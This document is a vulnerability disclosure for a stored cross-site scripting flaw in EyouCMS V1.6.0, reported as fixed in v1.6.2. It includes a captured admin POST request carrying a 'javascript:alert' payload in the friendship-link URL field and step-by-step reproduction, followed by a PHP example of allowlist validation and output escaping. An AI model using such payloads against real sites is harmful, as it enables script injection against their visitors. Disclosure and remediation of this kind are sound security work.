name: EyouCMS

version: EyouCMS-V1.6.0-UTF8-SP1

Installation package download:
Problematic packets:
```
POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.23.130:49160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.23.130:49160
Connection: close
Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload=

typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=
```
Vulnerability recurrence

1. Log in to the background, click "SEO module" -> "friendship link" -> "add link"

2. Input payload: javascript:alert(11), submit

Click and trigger XSS after submission

PS: The vulnerability will also be displayed on the home page and can be triggered by clicking
Fixed; released in version v1.6.2.
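
The request in this report places a `javascript:` URL in the `url` field of the friendship-link form, and it runs when the rendered link is clicked. One way to check such a field on the server and escape it on output, as an added example (not EyouCMS code and not the v1.6.2 fix; `safe_link_url` and `render_link` are hypothetical names):

```php
<?php
// Added example, not EyouCMS code. Function names are hypothetical.

/**
 * Return the URL if it is an absolute http(s) URL with a host, else null.
 */
function safe_link_url(string $raw): ?string
{
    // Trim surrounding whitespace and control characters. Anything that then
    // lacks a plain http/https scheme is rejected, so case or whitespace
    // variants of other schemes fail the allowlist as well.
    $url = trim($raw, "\x00..\x20");

    // Require an explicit scheme (RFC 3986 syntax) and allow only http/https.
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        return null;                       // scheme-less or relative value
    }
    if (!in_array(strtolower($m[1]), ['http', 'https'], true)) {
        return null;                       // javascript: and any other scheme
    }
    // The value must also parse as a URL and carry a host.
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || empty(parse_url($url, PHP_URL_HOST))) {
        return null;
    }
    return $url;
}

/** Render the link; output escaping is still applied to validated values. */
function render_link(string $url, string $title): string
{
    $safe = safe_link_url($url) ?? '#';    // fall back to an inert target
    return sprintf(
        '<a href="%s" rel="noopener noreferrer">%s</a>',
        htmlspecialchars($safe, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($title, ENT_QUOTES, 'UTF-8')
    );
}

// Constructed inputs; the first is the url value from the request above.
$samples = [
    'javascript:alert(123)',
    'JavaScript:alert(123)',
    'example.com',
    'https://example.com/?a=1&b=2',
];
foreach ($samples as $s) {
    echo $s, ' => ', var_export(safe_link_url($s), true), PHP_EOL;
    echo '  ', render_link($s, 'XS'), PHP_EOL;
}
```

Applying the check when the link is saved and again when it is rendered also covers rows stored before the validation existed.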